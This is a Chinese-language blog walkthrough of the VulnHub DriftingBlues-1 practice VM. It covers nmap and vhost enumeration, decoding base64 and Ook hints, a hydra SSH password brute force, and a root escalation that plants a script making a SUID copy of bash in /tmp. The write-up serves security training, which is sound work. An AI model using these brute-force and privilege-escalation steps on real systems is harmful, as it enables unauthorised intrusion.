vulnhub靶场之driftingblues-1

最新推荐文章于 2024-07-25 10:08:48 发布
最新推荐文章于 2024-07-25 10:08:48 发布
阅读量880 收藏 24
点赞数 22
分类专栏: [ vulnhub靶机通关篇 ] 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58091216/article/details/136270237
版权

一.环境搭建

1.靶场描述

get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshooting or questions.

2.靶场下载

https://www.vulnhub.com/entry/driftingblues-1,625/

image-20240204195436736

3.靶场启动

image-20240204195517626

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.1.0/24

二.信息收集

1.寻找靶场真实ip地址

nmap -sP 192.168.1.0/24

image-20240204195743518

arp-scan -l

image-20240204195833130

靶场真实ip地址为192.168.1.6

2.探测端口及服务

nmap -p- -sV 192.168.1.6

image-20240204200036360

发现开启了22端口,服务为OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
发现开启了80端口,服务为Apache httpd 2.4.18 ((Ubuntu))

3.web指纹识别

whatweb -v http://192.168.1.6

image-20240204200253063

三.渗透测试

1.访问web服务

image-20240204200348375

2.扫描web服务

1)棱洞3.0指纹识别

./EHole_linux_amd64 finger -u http://192.168.1.6

image-20240204200501925

没有信息

2)nikto扫描网站结构

nikto -h http://192.168.1.6

image-20240204200635070

3)disearch目录扫描

dirsearch -u 192.168.1.6 -e * -x 403 --random-agent

image-20240204200950837

image-20240204200931801

截止到目前,我们没有扫描到如何有用的信息,我们想想还有什么办法,突然想到源代码我们没有查看,我们进行查看

4)查看源代码

image-20240204201131720

我们找了很久,找到一个base64编码,我们进行解密

image-20240204201440212

解密之后,是一个目录

3.渗透测试

1)访问目录

http://192.168.1.6/noteforkingfish.txt

image-20240204201835321

2)解密

我们看到是一个Ook编码,我们进行解密

image-20240204202328901

image-20240204202358528

提示我们修改主机文件,那么我们进行修改

image-20240204202442278

3)修改主机文件

image-20240204202636502

然后我们进行扫描域名

4)gobuster扫描

gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

image-20240204215145797

重新修改/etc/hosts,添加为192.168.1.6 test.driftingblues.box,然后再后访问test.driftingblues.box

image-20240204215411095

我们进行访问

http://test.driftingblues.box/

image-20240204215534082

扫描到一个eric,我们先记一下

5)dirsearch扫描域名

sudo dirsearch -u http://test.driftingblues.box/ -e * -x 403 --random-agent

image-20240204215950863

我们进行查看

image-20240204220019202

6)robots.txt

http://test.driftingblues.box/ssh_cred.txt

image-20240204220104846

可能跟ssh登录有关系,果然是ssh登录的密码,不过末尾有数字,其他的都是404

image-20240204220202624

发现这里有个提示:这个的密码需要最后一位加一个数字才是正真的密码 这样的话就有十种可能 所以自己自定义个字典 把十种可能写进去

image-20240204220545518

既然说了是ssh登录的密码,那么我们就进行暴力破解

7)hydra暴力破解

猜测刚刚的提示 账号是 eric使用工具hydra尝试暴力破解,得到密码为:1mw4ckyyucky6 使用ssh 登入即可

hydra -l eric -P '/home/kali/桌面/MS02423.txt'  -v 192.168.1.6 ssh

image-20240204220902417

我们看到爆破成功,我们进行登录

8)ssh登录

ssh eric@192.168.1.6

9)提权

sudo -l

image-20240204221247919

我们发现不行,我们查看根目录下的内容

image-20240204221408468

我们找到了第一个flag

到这里,就没有思路了,但是一般情况下,我们会查看的几个目录:home,tmp,/var/www/html/,var

我们一个一个进行查看,在/var/里面发现了backups

我们进行查看,在/var/backups这个备份文件夹中找到一个.sh脚本文件

image-20240204222213298

backup.sh的内容就是用zip命令把/var/www目录下的所有内容打包为/tmp/backup.zip,然后sudo /tmp/emergency,在前面/tmp中找到了这个压缩文件,但是并没有找到emergency文件,需要创建emergency文件,并将eric用户加入sudo组

echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency
chmod +x emergency
 ./getroot -p

image-20240204222747642

我们查看flag

image-20240204222837963

image-20240204222856899

四.相关知识

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.ssh登录

10.hydra——密码暴利破解工具Hydra

11.ook解密: Brainfuck/OoK加密解密

12.gobuster扫描

MS02423
关注
  • 22
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub--DriftingBlues-1靶机通关详解
m0_72634167的博客
03-21 1957
1.自动任务提权的思路2.gobuster工具爆破子域名3.crunch生成密码列表的命令行工具的使用。
vulnhub靶场driftingblues-7,9
qq_58091216的博客
04-29 147
我们在/home/目录下发现了clapton文件夹,里面有user.txt,我们进行查看,发现了第一个flag。我们查看源代码,发现版本号是ApPHP MicroBlog v.1.0.1,我们可以进行搜索漏洞。我们访问80端口可以看到是一个登录页面,可能是爆破用户名和密码,其他端口都没有有用的信息。我们可以看到反弹成功,我们切换用户clapton/yaraklitepe。我们还看到了一个note.txt文件,我们进行查看,发现是一个提示。开启的端口有点多,首先我们一个一个进行渗透测试,我们先渗透靶场7。
vulnhub靶场driftingblues-6
qq_58091216的博客
04-28 236
靶场ip我们不知道,但是它的网段是192.168.1.0/24,我们进行探测。查看文件和权限都没发现什么,查看 SUID 文件,也没有什么可以提权的了。扫描到2个信息,一个是robots.txt,一个是登录页面。我们爆破出来一个spammer.zip压缩包,我们进行解压。我们发现是一个文件上传框架,我们上传一句话木马。首先我们可以在msf试试能不能爆破,但是不行。多了一个/db,我们一个一个进行访问。那么我们就根据提示,进行目录爆破。我们进行解压压缩包,发现需要密码。我们打开压缩包,发现用户名和密码。
vulnhub靶场driftingblues-5
qq_58091216的博客
04-01 963
具体来说,这个命令是将远程计算机上gill用户的/home/gill/目录中以”key”开头的文件复制到本地计算机的/root/目录。它提供了一个用户友好的界面,允许用户存储和管理他们的密码,并使用加密技术来保护这些密码。使用keyfile.kdbx文件中的名称,新建文件fracturedocean然后建立正确的文件名 就会获得一个新的文件rootcreds.txt。但是没有找到任何可以提权的,我们发现在根目录下,有一个keyfile.kdbx文件(第一次遇到这种文件)什么是DKBX文件?
vulnhub靶场driftingblues-2
qq_58091216的博客
03-28 924
我们进行查看,查找可以写入shell的地方,找到有一个404.php的页面可以编辑,此处使用php反弹shell的脚本,只需要修改ip和port为指定的值即可.我们看到没有爆破出来,我们换一个思路,前面我们扫描到cms框架是wordpress,我们可以使用wpscan进行爆破。我们切换的/home/,发现一个用户freddie,进入用户目录,有一个txt文件,但没有权限查看。我们查看一些目录——/home/,/tmp/,/var,/var/www/html。扫描到一个/blog/目录,我们进行访问。
vulnhub靶场driftingblues-3
qq_58091216的博客
03-28 701
分析查看靶机内文件,发现home目录下有一个robertj用户,且该用户目录下存在两个文件,user.txt”文件没有权限无法打开,.ssh 目录有可读可写可执行权限,进入 .ssh 目录进行查看,发现目录内没有任何文件内容。继续查看分析,查看ssh配置文件(默认目录/etc/ssh/sshd_config),发现可以公钥登录,并且给出了公钥文件存放目录 /home/robertj/.ssh/authorized_keys。我们可以看到是ssh日志记录,那么我们可以试试一句话木马连接ssh,会不会被记录。
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_[vulnhub靶机] driftingblues 3
2401_84715513的博客
05-12 430
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
vulnhub靶场driftingblues-4
qq_58091216的博客
03-31 387
是 sync(linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块),那我尝试往 ftp 中的 hubert 文件中写入 ssh 密钥,猜测应该就会同步到 hubert 用户的家目录中,现在 ftp 中的 hubert 目录下创建 .ssh 目录。我们查看页面,没有发现任何有用的信息,我们进行查看源代码,发现一串base64编码,我们一会进行解密查看。什么也没有,目前我们掌握的信息,只有一串base64编码,我们进行解密查看。发现是Brainfuck编码,我们进行解密,发现是一个二维码。
vulnhub靶场DRIFTINGBLUES: 7
weixin_42478365的博客
04-29 130
EyesOfNetwork5.3远程命令执行漏洞
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。...
“微软蓝屏”事件暴露网络安全哪些问题
sheji888的专栏
07-23 358
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
微软蓝屏事件:网络安全的多维挑战与应对策略
sinner小屋
07-23 704
微软蓝屏事件,这一近期震动全球科技界的重大事件,起因于一次看似平常的软件更新。美国电脑安全技术公司“众击”发布的更新包中隐藏着一个致命的“缺陷”,这个缺陷如同潜伏的病毒,一旦被激活,便在全球范围内引发了连锁反应。近850万台设备,从个人电脑到关键行业的服务器,无一幸免地遭遇了系统崩溃,屏幕上只剩下一片冰冷的蓝色。这一事件不仅影响了日常办公,更是波及了航空、医疗、传媒等关键领域,造成了航班延误、医疗服务中断、信息传播受阻等一系列严重后果。
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 663
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
【网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
par@ish的博客
07-22 1139
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
vulnhub靶场通关
09-09
1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值